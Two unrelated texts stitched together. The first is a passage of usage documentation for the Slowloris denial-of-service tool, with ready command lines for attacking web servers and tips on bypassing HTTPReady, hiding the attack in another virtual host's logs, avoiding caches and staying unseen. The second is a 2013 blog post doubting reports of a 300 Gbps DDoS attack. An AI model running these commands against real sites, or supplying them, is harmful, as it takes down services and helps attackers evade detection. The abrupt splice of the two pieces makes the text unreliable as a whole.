./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
=head2 HTTPReady Bypass
HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch.
=head3 HTTPReady Bypass Example
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready
=head2 Stealth Host DoS
If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable.  This way the logs that are created will go to a different virtual host log file, but only if they are kept separately.
=head3 Stealth Host DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com
=head2 HTTPS DoS
Slowloris does support SSL/TLS on an experimental basis with the -https switch.  The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development.  Your mileage may vary.
=head3 HTTPS DoS Example:
./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
=head2 HTTP Cache
Slowloris does support cache avoidance on an experimental basis with the -cache switch.  Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources.  The usefulness of this particular option has not been thoroughly tested.  Your mileage may vary.
=head3 HTTP Cache Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
=head1 Issues
Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation.  They may be ways around this, but not in this version at this time.  Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested.
Slowloris isn't completely quiet either, because it can't be.  Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder).  So it's not invisible if the traffic to the site is typically fairly low.  On higher traffic sites it will unlikely that it is noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture.
For some reason Slowloris works way better if run from a *Nix box than from Windows.  I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number.  If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems.  Either way, this program seems to work best if run from FreeBSD.
Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors.  So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another.  You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too.
=head1 What is a slow loris?
What exactly is a slow loris?  It's an extremely cute but endangered mammal that happens to also be poisonous.  Check this out:
http://www.youtube.com/watch?v=rLdQ3UhLoD4

 

The 300 Gbps DDoS Attack?

April 1st, 2013 by Barrett Lyon

On March 19th CloudFlare reported dealing with a DDoS attack for one of their customers ranging from 10 Gbps to 120 Gbps. They eventually wrote a blog post titled, “The DDoS That Almost Broke the Internet”. The New York Times wrote an article, calling the attack directed at one of CloudFlare’s customers “one of the largest computer attacks on the Internet, causing widespread congestion and jamming crucial infrastructure around the world.” The New York Time’s article states that the attack was in the size 300 billion bits per second (300 Gbps). Akamai employee Patrick Gilmore then backed the number by saying, “It is a real number,” Mr. Gilmore said. “It is the largest publicly announced DDoS attack in the history of the Internet.”

Yet, CloudFlare never actually saw the 300Gbps attack, they only saw about 120 Gbps (at the peak) of the advertised Godzilla attack. Where did the other 180Gbps go? CloudFlare’s CEO wrote, “While we don’t have direct visibility into the traffic loads they saw, we have been told by one major Tier 1 provider that they saw more than 300Gbps of attack traffic related to this attack. That would make this attack one of the largest ever reported.”

Okay, so one of their “Tier 1” providers is reporting 300Gbps of attack traffic that ended up on their network. Who was that Tier 1 provider? Apparently it was a Tier 2 provider called GTT. Not AT&T, not Level 3, not Tata Communications, but a little known network called GTT. Richard Steenbergen, GTT’s network engineer wrote a open letter (http://cluepon.net/ras/gizmodo) and stated, “First off I can confirm a few basic facts, namely that we really did receive a ~300 Gbps attack directed at Cloudflare, and later specifically targeted at pieces of our core infrastructure.” I know Richard, and he’s a smart guy, maybe one of the smartest network guys I know, but he provided no data to back his statement. Reporters need to check facts don’t they?

If I were a betting guy I would bet that Steenbergen did in fact filter 180 Gbps of traffic on behalf of CloudFlare. That’s a good chunk of traffic but by no means is it insane or the end of the Internet. Large attacks happen all the time and Tier 1 networks filter huge chunks of traffic constantly. I guess that’s why Patrick Gilmore called it the “largest ever reported [attack]”.

Very few users would have noticed if it were not of the sensational reporting and poor fact checking on behalf of the New York Times.